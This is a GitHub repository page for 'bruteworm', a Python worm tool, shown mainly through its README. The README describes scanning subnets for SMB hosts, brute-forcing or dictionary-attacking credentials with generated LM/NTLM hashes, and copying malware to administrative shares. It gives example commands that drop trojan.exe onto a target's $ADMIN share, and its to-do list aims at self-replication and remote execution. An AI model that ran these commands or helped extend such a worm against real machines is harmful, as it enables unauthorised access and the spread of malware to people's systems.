Skip to content
/ bruteworm Public

A simple worm that uses brute force and dictionary attacks through the network to infect vulnerable machines

28 stars 9 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

stphivos/bruteworm

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
.gitignore
.gitignore
 
 
README.md
README.md
 
 
__init__.py
__init__.py
 
 
__main__.py
__main__.py
 
 
generators.py
generators.py
 
 
hosts.py
hosts.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

bruteworm

A simple worm that uses brute force and dictionary attacks through the network to infect vulnerable machines.

Inspired from the famous SMB Worm Tool.

Currently limited to making connections with SMB directly over TCP (445) and SMB via NetBIOS API (139), but I may add support for more protocols in the future.

Dependencies

  • Python 2.7
  • Nmap 6.4

Features

  • Generates LM/NTLM hash lists from dictionary words or variable length permutations of specified alphabets
  • Scans for hosts with SMB running (forwards to Nmap) and performs OS detection upon session negotiation using impacket network library
  • Copies files from local host to public or administrative shares when correct password found

Usage

usage: bruteworm [-h] [-i INPUT] [-o OUTPUT] [-d DICTIONARY DICTIONARY] [-b]
                 [-c COUNT] [-n MIN] [-x MAX] [-a ALPHABET] [-t TARGET]
                 [-p PORT] [-u USER] [-s SHARE] [-v]
                 {build,scan,infect}

positional arguments:
  {build,scan,infect}                   interaction with specified hosts/subnet victims

optional arguments:
  -h, --help                            show this help message and exit
  -i INPUT, --input INPUT               source file path
  -o OUTPUT, --output OUTPUT            destination file path
  -d FILE PATH, --dictionary HASH PATH  attack of either type pass|hash + dictionary file path
  -b, --bruteforce                      use brute force for password guessing
  -c COUNT, --count COUNT               number of hashes to generate
  -n MIN, --min MIN                     minimum number characters in password
  -x MAX, --max MAX                     maximum number characters in password
  -a ALPHABET, --alphabet ALPHABET      alphabet of allowed characters without spaces
  -t TARGET, --target TARGET            target hosts/subnet e.g. 192.168.2.10, 192.168.2.0/24
  -p PORT, --port PORT                  target port e.g. 139
  -u USER, --user USER                  target username to use for authentication
  -s SHARE, --share SHARE               target share name to drop malware
  -v, --verbosity                       console has 3 verbosity levels

Examples

Generate precomputed hashes from a dictionary of words:

python bruteworm build -vvv -i /path/to/dictionary -o /save/to/hashes

Generate precomputed hashes for all possible passwords of 3-6 digits with lower case characters and digits:

python bruteworm build -vvv -i -n3 -x6 -o /save/to/hashes -a abcdefghijklmnopqrstuvwxyz0123456789

Authenticate as user john at host 192.168.1.135 using a password dictionary and copy trojan.exe to share $ADMIN:

python bruteworm infect -vvv -t 192.168.1.135 -d pass /path/to/dictionary -i trojan.exe -o trojan.exe -u john -s $ADMIN

TODOs

  • Make worm standalone so it can replicate itself more easily - as opposed to only acting as a dropper
  • Add support for remotely executing copied files using scheduled tasks or other API
  • Add support for user enumeration

About

A simple worm that uses brute force and dictionary attacks through the network to infect vulnerable machines

Resources

Readme
Activity

Stars

28 stars

Watchers

6 watching

Forks

9 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages